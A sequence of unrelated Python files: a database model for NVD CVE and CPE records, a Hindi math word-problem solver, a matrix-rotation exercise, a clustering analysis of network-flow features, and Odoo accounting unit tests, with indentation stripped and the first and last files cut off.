- cvss_v3_privileges_required = impact["baseMetricV3"]["cvssV3"]["privilegesRequired"]
- cvss_v3_user_interaction = impact["baseMetricV3"]["cvssV3"]["userInteraction"]
- cvss_v3_scope = impact["baseMetricV3"]["cvssV3"]["scope"]
- cvss_v3_confidentiality_impact = impact["baseMetricV3"]["cvssV3"]["confidentialityImpact"]
- cvss_v3_integrity_impact = impact["baseMetricV3"]["cvssV3"]["integrityImpact"]
- cvss_v3_availability_impact = impact["baseMetricV3"]["cvssV3"]["availabilityImpact"]
- cvss_v3_base_score = impact["baseMetricV3"]["cvssV3"]["baseScore"]
- cvss_v3_base_severity = impact["baseMetricV3"]["cvssV3"]["baseSeverity"]
- base_metric_v3_exploitability_score = impact["baseMetricV3"]["exploitabilityScore"]
- base_metric_v3_impact_score = impact["baseMetricV3"]["impactScore"]
- cvss_v3_impact_score = impact["baseMetricV3"]["impactScore"]
- cvss_v2_version = impact["baseMetricV2"]["cvssV2"]["version"]
- cvss_v2_vector_string = impact["baseMetricV2"]["cvssV2"]["vectorString"]
- cvss_v2_access_vector = impact["baseMetricV2"]["cvssV2"]["accessVector"]
- cvss_v2_access_complexity = impact["baseMetricV2"]["cvssV2"]["accessComplexity"]
- cvss_v2_authentication = impact["baseMetricV2"]["cvssV2"]["authentication"]
- cvss_v2_confidentiality_impact = impact["baseMetricV2"]["cvssV2"]["confidentialityImpact"]
- cvss_v2_integrity_impact = impact["baseMetricV2"]["cvssV2"]["integrityImpact"]
- cvss_v2_availability_impact = impact["baseMetricV2"]["cvssV2"]["availabilityImpact"]
- cvss_v2_base_score = impact["baseMetricV2"]["cvssV2"]["baseScore"]
- base_metric_v2_severity = impact["baseMetricV2"]["severity"]
- base_metric_v2_exploitability_score = impact["baseMetricV2"]["exploitabilityScore"]
- base_metric_v2_impact_score = impact["baseMetricV2"]["impactScore"]
- base_metric_v2_obtain_all_privilege = impact["baseMetricV2"]["obtainAllPrivilege"]
- base_metric_v2_obtain_user_privilege = impact["baseMetricV2"]["obtainUserPrivilege"]
- base_metric_v2_obtain_other_privilege = impact["baseMetricV2"]["obtainOtherPrivilege"]
- base_metric_v2_user_interaction_required = impact["baseMetricV2"]["userInteractionRequired"]
- published_date = publishedDate
- last_modified_date = lastModifiedDate
- full_cve_json = ["CVE_Items"][0]
- record_creation_date = generated by SQLAlchemy
"""
id = db.Column(db.Integer, primary_key=True)
cve_id = db.Column(db.String(75), nullable=False)
description = db.Column(db.Text, nullable=False)
cvss_v3_version = db.Column(db.String(75))
cvss_v3_vector_string = db.Column(db.String(75))
cvss_v3_attack_vector = db.Column(db.String(75))
cvss_v3_attack_complexity = db.Column(db.String(75))
cvss_v3_privileges_required = db.Column(db.String(75))
cvss_v3_user_interaction = db.Column(db.String(75))
cvss_v3_scope = db.Column(db.String(75))
cvss_v3_confidentiality_impact = db.Column(db.String(75))
cvss_v3_integrity_impact = db.Column(db.String(75))
cvss_v3_availability_impact = db.Column(db.String(75))
cvss_v3_base_score = db.Column(db.Float)
cvss_v3_base_severity = db.Column(db.String(75))
base_metric_v3_exploitability_score = db.Column(db.Float)
base_metric_v3_impact_score = db.Column(db.Float)
cvss_v2_version = db.Column(db.String(75))
cvss_v2_vector_string = db.Column(db.String(75))
cvss_v2_access_vector = db.Column(db.String(75))
cvss_v2_access_complexity = db.Column(db.String(75))
cvss_v2_authentication = db.Column(db.String(75))
cvss_v2_confidentiality_impact = db.Column(db.String(75))
cvss_v2_integrity_impact = db.Column(db.String(75))
cvss_v2_availability_impact = db.Column(db.String(75))
cvss_v2_base_score = db.Column(db.Float)
base_metric_v2_severity = db.Column(db.String(75))
base_metric_v2_exploitability_score = db.Column(db.Float)
base_metric_v2_impact_score = db.Column(db.Float)
base_metric_v2_obtain_all_privilege = db.Column(db.Boolean)
base_metric_v2_obtain_user_privilege = db.Column(db.Boolean)
base_metric_v2_obtain_other_privilege = db.Column(db.Boolean)
base_metric_v2_user_interaction_required = db.Column(db.Boolean)
published_date = db.Column(db.DateTime, nullable=False)
last_modified_date = db.Column(db.DateTime)
full_cve_json = db.Column(db.JSON, nullable=False)
record_creation_date = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
__tablename__ = "cve"
def save(self):
db.session.add(self)
db.session.commit()
@staticmethod
def is_record_present(nvd_cve_id):
"""
Return true if a record in the table contains the nvd_cve_id
"""
result = CVE.query.filter_by(cve_id=nvd_cve_id).scalar()
return result is not None
@staticmethod
def get_records_by_cve_id(nvd_cve_id):
"""
Return result set of all records with input cve_id
"""
result_set = CVE.query.filter_by(cve_id=nvd_cve_id).all()
return result_set
@staticmethod
def get_last_modified_record_by_cve_id(nvd_cve_id):
"""
Return cve with the most recent last_modified_date.
"""
result_set = CVE.get_records_by_cve_id(nvd_cve_id)
if result_set:
last_modified_record = result_set[0]
for record in result_set:
if last_modified_record is None:
last_modified_record = record
elif (
record.last_modified_date > last_modified_record.last_modified_date
):
last_modified_record = record
else:
last_modified_record = None
return last_modified_record
@staticmethod
def get_entities_dict():
return {
"id": CVE.id,
"cve_id": CVE.cve_id,
"description": CVE.description,
"cvss_v3_version": CVE.cvss_v3_version,
"cvss_v3_vector_string": CVE.cvss_v3_vector_string,
"cvss_v3_attack_vector": CVE.cvss_v3_attack_vector,
"cvss_v3_attack_complexity": CVE.cvss_v3_attack_complexity,
"cvss_v3_privileges_required": CVE.cvss_v3_privileges_required,
"cvss_v3_user_interaction": CVE.cvss_v3_user_interaction,
"cvss_v3_scope": CVE.cvss_v3_scope,
"cvss_v3_confidentiality_impact": CVE.cvss_v3_confidentiality_impact,
"cvss_v3_integrity_impact": CVE.cvss_v3_integrity_impact,
"cvss_v3_availability_impact": CVE.cvss_v3_availability_impact,
"cvss_v3_base_score": CVE.cvss_v3_base_score,
"cvss_v3_base_severity": CVE.cvss_v3_base_severity,
"base_metric_v3_exploitability_score": CVE.base_metric_v3_exploitability_score,
"base_metric_v3_impact_score": CVE.base_metric_v3_impact_score,
"cvss_v2_version": CVE.cvss_v2_version,
"cvss_v2_vector_string": CVE.cvss_v2_vector_string,
"cvss_v2_access_vector": CVE.cvss_v2_access_vector,
"cvss_v2_access_complexity": CVE.cvss_v2_access_complexity,
"cvss_v2_authentication": CVE.cvss_v2_authentication,
"cvss_v2_confidentiality_impact": CVE.cvss_v2_confidentiality_impact,
"cvss_v2_integrity_impact": CVE.cvss_v2_integrity_impact,
"cvss_v2_availability_impact": CVE.cvss_v2_availability_impact,
"cvss_v2_base_score": CVE.cvss_v2_base_score,
"base_metric_v2_severity": CVE.base_metric_v2_severity,
"base_metric_v2_exploitability_score": CVE.base_metric_v2_exploitability_score,
"base_metric_v2_impact_score": CVE.base_metric_v2_impact_score,
"base_metric_v2_obtain_all_privilege": CVE.base_metric_v2_obtain_all_privilege,
"base_metric_v2_obtain_user_privilege": CVE.base_metric_v2_obtain_user_privilege,
"base_metric_v2_obtain_other_privilege": CVE.base_metric_v2_obtain_other_privilege,
"base_metric_v2_user_interaction_required": CVE.base_metric_v2_user_interaction_required,
"published_date": CVE.published_date,
"last_modified_date": CVE.last_modified_date,
"full_cve_json": CVE.full_cve_json,
"record_creation_date": CVE.record_creation_date,
}
def __repr__(self):
return "<CVE %r>" % self.cve_id
class CPE_Match(db.Model):
"""
JSON schema
{
"cpe23Uri" : "cpe:2.3:a:\\$0.99_kindle_books_project:\\$0.99_kindle_books:6:*:*:*:*:android:*:*",
"cpe_name" :
[
{
"cpe23Uri" : "cpe:2.3:a:\\$0.99_kindle_books_project:\\$0.99_kindle_books:6:*:*:*:*:android:*:*"
}
]
}
This model represents a single `match` from the `matches` list in nvdcpematch-1.0.json.
"""
id = db.Column(db.Integer, primary_key=True)
cpe_23_uri = db.Column(db.String, nullable=False)
cpe_name = db.Column(
db.Text, nullable=True
) # This is a list of dicts that we will turn into a comma sep string on model creation.
full_cpe_match_json = db.Column(db.JSON, nullable=False)
record_creation_date = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
__tablename__ = "cpe_match"
def save(self):
db.session.add(self)
db.session.commit()
@staticmethod
def get_records_by_cpe_23_uri(cpe_23_uri):
"""
Return result set of all records with input cpe_23_uri
"""
result_set = CPE_Match.query.filter_by(cpe_23_uri=cpe_23_uri).all()
return result_set
def __repr__(self):
return "<CPE_Match %r>" % self.cpe_23_uri
def get_cve_query_df_with_columns(col_names_list=None):
"""
Using col_names_list to create an entities list create a SQLAlchemy query statement.
Uses the paramaterized query statement with pandas read_sql to return a dataframe with query result.
"""
entities_dict = CVE.get_entities_dict()
if col_names_list is None:
entities_list = entities_dict.values()
else:
entities_list = [entities_dict[col_name] for col_name in col_names_list]
query_statement = (
CVE.query.order_by(CVE.published_date.asc())
.with_entities(*entities_list)
.statement
)
return pd.read_sql(query_statement, db.engine)
def get_cvss_v3_cols():
return [key for key in CVE.get_entities_dict().keys() if "v2" not in key]
def get_cvss_v2_cols():
return [key for key in CVE.get_entities_dict().keys() if "v3" not in key]
|
# coding=utf-8
from __future__ import division
from collections import OrderedDict
from makeVerbDict import makeVerbDictionary
from Containers import Container
from Question import Question
from numbers import Number
verbTags = ['VM','PSP','NST','VAUX']
trainingDictionary = makeVerbDictionary("POSOutWithVC.txt")
# Replacing it with synset later
questionWords = ['कुल', 'समस्त', 'सब', 'पूरा', 'सारा', 'संपूर्ण', 'सम्पूर्ण', 'पूर्ण', 'समूचा', 'सर्व', 'निखिल', 'अकत', 'अखिल', 'सकल', 'तमाम', 'मुसल्लम', 'विश्वक', 'कामिल', 'अवयवी', 'अशेष', 'भर', 'विश्व']
def main():
global j
lines = []
with open("POSOut.txt") as tagged_file:
lines = tagged_file.readlines()
sentences = []
for i in range(0, len(lines)):
lines[i] = lines[i].rstrip("\n")
for i in range(0, len(lines) - 1):
if lines[i] == '<s>':
sentence = OrderedDict()
for j in range(i + 1, len(lines)):
if lines[j] == '</s>':
i = j
break
else:
tag, word = lines[j].split(" ")
# print (tag + word)
sentence[tag] = word
# sentence[]
sentences.append(sentence)
else:
continue
question = Question()
sentence_number= 0
for i in range(0,len(sentences)-1):
if sentence_number == 0:
containerFirstSentence(sentences[i], question)
else:
containerOtherSentence(sentences[i], question,sentence_number)
# After creating copy containers, call modify on same sentence by passing the same copied container
modifyContainer(sentences[i],question,sentence_number)
sentence_number += 1
name = ""
quantity = ""
entity = ""
attribute = ""
pronoun = ""
# False means past
tense = ""
totalKeyword = False
for key, value in sentences[len(sentences)-1].iteritems():
if value == "NNP":
name = key
if value == 'PNP':
pronoun = key
if key == 'है':
tense = "PRESENT"
if key == 'था':
tense = "PAST"
if key in questionWords:
totalKeyword = True
if tense == "":
tense = "PRESENT"
print "Container1"
question.printContainer1()
print "Container2"
question.printContainer2()
containerArrayToBePassed = None
result = None
if totalKeyword == True:
result = solution(tense,question.container1,question.container2)
else:
if name == question.container1[len(sentences)-2].name:
containerArrayToBePassed = question.container1
else:
containerArrayToBePassed = question.container2
result = solution(tense,containerArrayToBePassed)
print "The final result is: ",
print result
def solution(tense, container1, container2 = None):
print tense
result = 0
if tense == "PRESENT":
if container2 is None:
expression = container1[len(container1)-1].quantity.split(" ")
print "Equation is: "+container1[len(container1)-1].quantity
return getExpressionResult(expression)
else:
expression = container1[len(container1)-1].quantity.split(" ")
print "Equation is: "+container1[len(container1)-1].quantity
result += getExpressionResult(expression)
expression = container2[len(container2)-1].quantity.split(" ")
print "Equation is: "+container2[len(container2)-1].quantity
result += getExpressionResult(expression)
return result
if tense == "PAST":
print "Hello"
left_side = container1[len(container1)-2].quantity.split(" ")
right_side = container1[len(container1)-1].quantity.split(" ")
print "Equation is :"
print container1[len(container1)-2].quantity,
print " = ",
print container1[len(container1)-1].quantity
return getEquationResult(left_side, right_side)
def getExpressionResult(expression):
if len(expression) == 3:
first_operand = float(expression[0])
second_operand = float(expression[2])
result = 0
if expression[1].strip() == "+":
result = first_operand + second_operand
elif expression[1].strip() == "-":
result = first_operand - second_operand
return result
else:
return float(expression[0])
def getEquationResult(left_side, right_side):
right_side = float(right_side[0])
second_operand = float(left_side[2])
result = 0
if left_side[1].strip() == "+":
result = right_side - second_operand
elif left_side[1].strip() == "-":
result = right_side + second_operand
return result
def modifyContainer(sentence, question, sentence_number):
# print sentence
# indexOfVerb = -1
# indexOfQuantity = -1
index = 0
indexOfPronoun = -1
valueEncountered = []
integerWordDict = OrderedDict()
listOfIndicesOfProperNouns = []
namesOfProperNouns = []
verbsFound = []
val = 0
for key, value in sentence.iteritems():
integerWordDict[index] = key
if value == 'PRP':
indexOfPronoun = index
if value == 'NNP' :
listOfIndicesOfProperNouns.append(index)
namesOfProperNouns.append(key)
if value in verbTags:
# print key
verbsFound.append(key)
if value == 'QC':
# indexOfQuantity = index
val = convertToEnglish(key)
valueEncountered.append(val)
index += 1
actionToBePerformed = categoriseVerb(verbsFound)
# Depending on action to be performed, there will be two operations
actionInOneContainer, actionInSecondContainer = twoActions(actionToBePerformed)
if len(listOfIndicesOfProperNouns)==2:
# name name
firstName = namesOfProperNouns[0]
secondName = namesOfProperNouns[1]
if firstName == question.container1[sentence_number].name:
q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
question.container1[sentence_number].quantity = q1
else:
q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInSecondContainer,val)
question.container2[sentence_number].quantity = q2
if firstName == question.container2[sentence_number].name:
q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInOneContainer,val)
question.container2[sentence_number].quantity = q2
else:
q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInSecondContainer, val)
question.container1[sentence_number].quantity = q1
elif len(listOfIndicesOfProperNouns)==1 and indexOfPronoun!= -1:
# name pronoun
q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
question.container1[sentence_number].quantity = q1
q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInSecondContainer,val)
question.container2[sentence_number].quantity = q2
elif indexOfPronoun!=-1:
# only pronoun
q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
question.container1[sentence_number].quantity = q1
elif indexOfPronoun == -1:
# only noun
nameFound = namesOfProperNouns[0]
if nameFound == question.container1[sentence_number].name:
q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
question.container1[sentence_number].quantity = q1
else:
q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInOneContainer, val)
question.container2[sentence_number].quantity = q2
def modifyQuantityOfCurrentContainer(quantity_of_container, action, value_to_add_delete):
# add or delete value
if action.strip(" ") == "POSITIVE":
return str(quantity_of_container) + " + " + str(value_to_add_delete)
elif action.strip(" ") == "NEGATIVE":
return str(quantity_of_container) + " - " + str(value_to_add_delete)
else:
return str(value_to_add_delete)
def twoActions(actionToBePerformed):
# Depending upon either observation, construct, destroy, transfer, return pos,neg, None
if actionToBePerformed == 0 :
return "NONE", "NONE"
elif actionToBePerformed == 1:
return "POSITIVE", "POSITIVE"
elif actionToBePerformed == 2:
return "NEGATIVE", "NEGATIVE"
elif actionToBePerformed == 3:
return "POSITIVE", "NEGATIVE"
else:
return "NEGATIVE", "POSITIVE"
def categoriseVerb(verbsFound):
# for i in range(0, len(verbsFound)):
# print verbsFound[i],
# for key, value in trainingDictionary.iteritems():
# print key,
# print value
# print trainingDictionary
newValuesOfProbabilty = [1.0 for i in range(0,5)]
for j in range(0,5):
for i in range(0,len(verbsFound)):
if verbsFound[i] in trainingDictionary:
individualProbabilty = trainingDictionary[verbsFound[i]][j]/trainingDictionary[verbsFound[i]][5]
newValuesOfProbabilty[j] = newValuesOfProbabilty[j]*individualProbabilty
max_value = max(newValuesOfProbabilty)
# print newValuesOfProbabilty
max_indices = [index for index, value in enumerate(newValuesOfProbabilty) if value==max_value]
return max_indices[0]
def containerFirstSentence(sentence, question):
names = set()
for key, value in sentence.iteritems():
if value == "NNP":
names.add(key)
question.names = names
if len(names) == 1:
quantityFlag = False
entityFlag = False
name = ""
quantity = ""
entity = ""
attribute = ""
for key, value in sentence.iteritems():
# print str(key)+" "+str(value)
if value == "NNP":
name = key
if value == "QC" and isNumber(key):
quantity = convertToEnglish(key)
quantityFlag = True
if quantityFlag and not entityFlag and value == "NN":
entity = key
entityFlag = True
if quantityFlag and not entityFlag and value == "JJ":
attribute = key
container = Container(name, entity, attribute, quantity)
question.addContainer(container)
# add empty container in second container also
question.addContainer(Container())
# container.printContainer()
else:
# There are more than two NNP
integer_word_dict = OrderedDict()
count = 0
indexOfFirstNNP = -1
indexOfSecondNNP = -1
for key, value in sentence.iteritems():
integer_word_dict[count] = key
if value == 'NNP' and indexOfFirstNNP == -1:
indexOfFirstNNP = count
elif value == 'NNP' and indexOfFirstNNP != -1:
indexOfSecondNNP = count
count += 1
quantityFlag = False
entityFlag = False
name = ""
quantity = ""
entity = ""
attribute = ""
for i in range(0, indexOfSecondNNP):
if sentence[integer_word_dict[i]] == "NNP":
name = integer_word_dict[i]
if sentence[integer_word_dict[i]] == "QC" and isNumber(integer_word_dict[i]):
quantity = convertToEnglish(integer_word_dict[i])
quantityFlag = True
if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "NN":
entity = integer_word_dict[i]
entityFlag = True
if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "JJ":
attribute = key
container = Container(name, entity, attribute, quantity)
question.addContainer(container)
# container.printContainer()
if indexOfSecondNNP!=-1:
for i in range(indexOfSecondNNP, len(sentence)):
if sentence[integer_word_dict[i]] == "NNP":
name = integer_word_dict[i]
if sentence[integer_word_dict[i]] == "QC" and isNumber(integer_word_dict[i]):
quantity = convertToEnglish(integer_word_dict[i])
quantityFlag = True
if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "NN":
entity = integer_word_dict[i]
entityFlag = True
if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "JJ":
attribute = integer_word_dict[i]
container = Container(name, entity, attribute, quantity)
question.addContainer(container)
# container.printContainer()
def containerOtherSentence(sentence, question, sentence_number):
# find pronoun, noun, verb
copyConstructorOf1 = Container()
copyConstructorOf1.copyContainer(question.container1[sentence_number-1])
# print "first ka copy"
# copyConstructorOf1.printContainer()
question.addContainer(copyConstructorOf1)
# print len(question.names)
# print "Hah"
name = ""
quantity = ""
entity = ""
attribute = ""
quantityFlag = False
entityFlag = False
if len(question.names)==1:
booleanMakeNewContainer = False
for key, value in sentence.iteritems():
if value == "NNP" and key not in question.names:
newName = key
booleanMakeNewContainer = True
question.names.add(newName)
if quantityFlag and not entityFlag and value == "NN":
entity = key
entityFlag = True
if quantityFlag and not entityFlag and value == "JJ":
attribute = key
if booleanMakeNewContainer==True:
container = Container(newName, entity, attribute, "X")
question.addContainer(container)
# container.printContainer()
else:
# Copy second container also that is make container2[1]
copyConstructorOf2 = Container()
copyConstructorOf2.copyContainer(question.container2[sentence_number-1])
# print "second copy"
# copyConstructorOf2.printContainer()
question.addContainer(copyConstructorOf2)
def isNumber(num):
numList = ['०','१','२','३','४','५','६','७','८','९']
number = 0
multiplier = 1
for i in range(len(num)-1, -1, -3):
digit = num[i-2:i+1]
if digit not in numList:
return False
else:
number += int(convertToEnglish(digit)) * multiplier
multiplier *= 10
return isinstance(number, Number)
def convertToEnglish(num):
ans = ""
hindiToEnglish = OrderedDict()
# for i in range(0,10):
hindiToEnglish['०'] = 0;
hindiToEnglish['१'] = 1;
hindiToEnglish['२'] = 2;
hindiToEnglish['३'] = 3;
hindiToEnglish['४'] = 4;
hindiToEnglish['५'] = 5;
hindiToEnglish['६'] = 6;
hindiToEnglish['७'] = 7;
hindiToEnglish['८'] = 8;
hindiToEnglish['९'] = 9;
for i in range(0, len(num), 3):
temp_digit = hindiToEnglish[num[i:i + 3]]
ans += str(temp_digit)
return ans
if __name__ == "__main__":
main() |
#Rotate Matrix
def generateMatrix(n):
size = n
matrix = []
for i in range(n):
inside = []
for j in range(n):
inside.append(j + i * 2)
matrix.append(inside)
return matrix
def rotateMatrix(matrix):
#rotMatrix = [[0] * len(matrix[0])] * len(matrix)
n = len(matrix)
rotMatrix = [[0 for i in range(n)] for i in range(n)]
#print(matrix)
for i in range(n):
for j in range(n):
#print(matrix[n - j - 1][i])
rotMatrix[i][j] = matrix[n - j - 1][i]
#print(rotMatrix ,i , j)
return rotMatrix
m = generateMatrix(3)
print(m , len(m) , len(m[0]))
print(rotateMatrix(m))
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
import seaborn as sns
from sklearn.preprocessing import LabelEncoder
from mpl_toolkits.mplot3d import Axes3D
from sklearn.cluster import KMeans
names = ["ID", "Flow.ID", "Source.IP", "Source.Port", "Destination.IP",
"Destination.Port", "Protocol", "Timestamp", "Flow.Duration",
"Total.Fwd.Packets", "Total.Backward.Packets", "Total.Length.of.Fwd.Packets",
"Total.Length.of.Bwd.Packets", "Fwd.Packet.Length.Max", "Fwd.Packet.Length.Min",
"Fwd.Packet.Length.Mean", "Fwd.Packet.Length.Std", "Bwd.Packet.Length.Max",
"Bwd.Packet.Length.Min", "Bwd.Packet.Length.Mean", "Bwd.Packet.Length.Std", "Flow.Bytes.s",
"Flow.Packets.s", "Flow.IAT.Mean", "Flow.IAT.Std", "Flow.IAT.Max", "Flow.IAT.Min", "Fwd.IAT.Total",
"Fwd.IAT.Mean", "Fwd.IAT.Std", "Fwd.IAT.Max", "Fwd.IAT.Min", "Bwd.IAT.Total", "Bwd.IAT.Mean", "Bwd.IAT.Std",
"Bwd.IAT.Max", "Bwd.IAT.Min", "Fwd.PSH.Flags", "Bwd.PSH.Flags", "Fwd.URG.Flags", "Bwd.URG.Flags",
"Fwd.Header.Length", "Bwd.Header.Length", "Fwd.Packets.s", "Bwd.Packets.s", "Min.Packet.Length",
"Max.Packet.Length", "Packet.Length.Mean", "Packet.Length.Std", "Packet.Length.Variance",
"FIN.Flag.Count", "SYN.Flag.Count", "RST.Flag.Count", "PSH.Flag.Count", "ACK.Flag.Count",
"URG.Flag.Count", "CWE.Flag.Count", "ECE.Flag.Count", "Down.Up.Ratio", "Average.Packet.Size",
"Avg.Fwd.Segment.Size", "Avg.Bwd.Segment.Size", "Fwd.Header.Length.1", "Fwd.Avg.Bytes.Bulk",
"Fwd.Avg.Packets.Bulk", "Fwd.Avg.Bulk.Rate", "Bwd.Avg.Bytes.Bulk", "Bwd.Avg.Packets.Bulk",
"Bwd.Avg.Bulk.Rate", "Subflow.Fwd.Packets", "Subflow.Fwd.Bytes", "Subflow.Bwd.Packets", "Subflow.Bwd.Bytes",
"Init_Win_bytes_forward", "Init_Win_bytes_backward", "act_data_pkt_fwd", "min_seg_size_forward",
"Active.Mean", "Active.Std", "Active.Max", "Active.Min", "Idle.Mean", "Idle.Std", "Idle.Max", "Idle.Min", "Label"]
names_id = ["ID", "Cluster"]
df_raw = pd.read_csv('raw_data_remove1st.csv', names=names, low_memory=False)
df_cluster = pd.read_csv('cluster_remove.csv', names=names_id, low_memory=False)
df_cluster.drop('ID', axis=1, inplace=True)
print(df_raw.shape)
print(df_cluster.shape)
df_feature = pd.DataFrame()
df_raw['Flow.ID'] = df_raw['Flow.ID'].astype('category')
df_raw['Source.IP'] = df_raw['Source.IP'].astype('category')
df_raw['Destination.IP'] = df_raw['Destination.IP'].astype('category')
df_raw['Timestamp'] = df_raw['Timestamp'].astype('category')
cat_columns = df_raw.select_dtypes(['category']).columns
df_raw[cat_columns] = df_raw[cat_columns].apply(lambda x: x.cat.codes)
df_feature['Source.IP'] = df_raw['Source.IP']
df_feature['Source.Port'] = df_raw['Source.Port']
df_feature['Destination.IP'] = df_raw['Destination.IP']
df_feature['Destination.Port'] = df_raw['Destination.Port']
df_feature['Protocol'] = df_raw['Protocol']
df_feature['Init_Win_bytes_forward'] = df_raw['Init_Win_bytes_forward']
df_feature['Flow.ID'] = df_raw['Flow.ID']
df_feature['Protocol'] = df_raw['Protocol']
df_feature['min_seg_size_forward'] = df_raw['min_seg_size_forward']
print(df_raw.shape)
data = df_feature.to_numpy()
X = data[:,0:9]
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
sScaler = StandardScaler()
rescaleX = sScaler.fit_transform(X)
pca = PCA(n_components=2)
rescaleX = pca.fit_transform(rescaleX)
principalDf = pd.DataFrame(data = rescaleX, columns = ['principal component 1', 'principal component 2'])
data = principalDf.to_numpy()
plt.clf()
plt.figure()
plt.title('KDD data set - Linear separability')
plt.xlabel('pc1')
plt.ylabel('pc2')
kmeans = KMeans(n_clusters=4,random_state=0).fit(rescaleX)
y_kmeans = kmeans.predict(rescaleX)
#plt.scatter(principalDf.iloc[:,0], principalDf.iloc[:,1], c=y_kmeans, s=50, cmap='viridis')
#centers = kmeans.cluster_centers_
#plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)
from sklearn.metrics.cluster import adjusted_mutual_info_score
ans = df_cluster.to_numpy()
ans = ans.flatten()
kmeans_performance = adjusted_mutual_info_score ( ans,y_kmeans )
print("kmeans_performance: ")
print(kmeans_performance)
print("")
from sklearn.cluster import Birch
brc = Birch(n_clusters=4)
y_brc = brc.fit(rescaleX)
y_brc_ans = y_brc.predict(rescaleX)
birch_performance = adjusted_mutual_info_score ( ans,y_brc_ans )
print("Birch_performance: ")
print(birch_performance)
print("")
from sklearn.cluster import SpectralClustering
'''
spectralA = SpectralClustering(n_clusters=4, affinity='rbf',
assign_labels='kmeans')
y_spectralA = spectralA.fit_predict(rescaleX)
performance2 = adjusted_mutual_info_score ( ans,y_spectralA )
print("SpectralA_performance: ")
print(performance2)
print("")
'''
spectralA = SpectralClustering(n_clusters=4, affinity='rbf',
assign_labels='discretize')
y_spectralB = spectralA.fit_predict(rescaleX)
performance3 = adjusted_mutual_info_score ( ans,y_spectralB )
plt.scatter(principalDf.iloc[:,0], principalDf.iloc[:,1],
c=y_spectralB, s=50, cmap='viridis')
plt.show()
print("SpectralB_performance: ")
print(performance3)
print("")
|
# -*- coding: utf-8 -*-
from unittest.mock import patch
from odoo.addons.account_auto_transfer.tests.account_auto_transfer_test_classes import AccountAutoTransferTestCase
from odoo import fields
from odoo.tests import tagged
# ############################################################################ #
# UNIT TESTS #
# ############################################################################ #
@tagged('post_install', '-at_install')
class MoveModelLineTestCase(AccountAutoTransferTestCase):
def setUp(self):
super().setUp()
self._assign_origin_accounts()
def test__get_transfer_move_lines_values_same_aaccounts(self):
amounts = [4242.42, 1234.56]
aaccounts = [self._create_analytic_account('ANAL0' + str(i)) for i in range(2)]
self._create_basic_move(
cred_account=self.destination_accounts[0].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[0],
deb_analytic=aaccounts[0].id
)
self._create_basic_move(
cred_account=self.destination_accounts[1].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[1],
deb_analytic=aaccounts[1].id
)
transfer_model_line_1 = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccounts[0].id, aaccounts[1].id])
transfer_model_line_2 = self._add_transfer_model_line(self.destination_accounts[1].id,
analytic_account_ids=[aaccounts[0].id])
transfer_models_lines = transfer_model_line_1 + transfer_model_line_2
args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
res = transfer_models_lines._get_transfer_move_lines_values(*args)
exp = [{
'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL00, ANAL01)',
'account_id': self.destination_accounts[0].id,
'date_maturity': args[1],
'debit': sum(amounts),
}, {
'name': 'Automatic Transfer (entries with analytic account(s): ANAL00, ANAL01)',
'account_id': self.origin_accounts[0].id,
'date_maturity': args[1],
'credit': sum(amounts),
}]
self.assertListEqual(exp, res,
'Only first transfer model line should be handled, second should get 0 and thus not be added')
def test__get_transfer_move_lines_values(self):
amounts = [4242.0, 1234.56]
aaccounts = [self._create_analytic_account('ANAL0' + str(i)) for i in range(3)]
self._create_basic_move(
cred_account=self.destination_accounts[0].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[0],
deb_analytic=aaccounts[0].id
)
self._create_basic_move(
cred_account=self.destination_accounts[1].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[1],
deb_analytic=aaccounts[2].id
)
transfer_model_line_1 = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccounts[0].id, aaccounts[1].id])
transfer_model_line_2 = self._add_transfer_model_line(self.destination_accounts[1].id,
analytic_account_ids=[aaccounts[2].id])
transfer_models_lines = transfer_model_line_1 + transfer_model_line_2
args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
res = transfer_models_lines._get_transfer_move_lines_values(*args)
exp = [
{
'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL00, ANAL01)',
'account_id': self.destination_accounts[0].id,
'date_maturity': args[1],
'debit': amounts[0],
},
{
'name': 'Automatic Transfer (entries with analytic account(s): ANAL00, ANAL01)',
'account_id': self.origin_accounts[0].id,
'date_maturity': args[1],
'credit': amounts[0],
},
{
'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL02)',
'account_id': self.destination_accounts[1].id,
'date_maturity': args[1],
'debit': amounts[1],
},
{
'name': 'Automatic Transfer (entries with analytic account(s): ANAL02)',
'account_id': self.origin_accounts[0].id,
'date_maturity': args[1],
'credit': amounts[1],
}
]
self.assertListEqual(exp, res)
@patch('odoo.addons.account_auto_transfer.models.transfer_model.TransferModel._get_move_lines_base_domain')
def test__get_move_lines_domain(self, patched):
return_val = [('bla', '=', 42)]
# we need to copy return val as there are edge effects due to mocking
# return_value is modified by the function call)
patched.return_value = return_val[:]
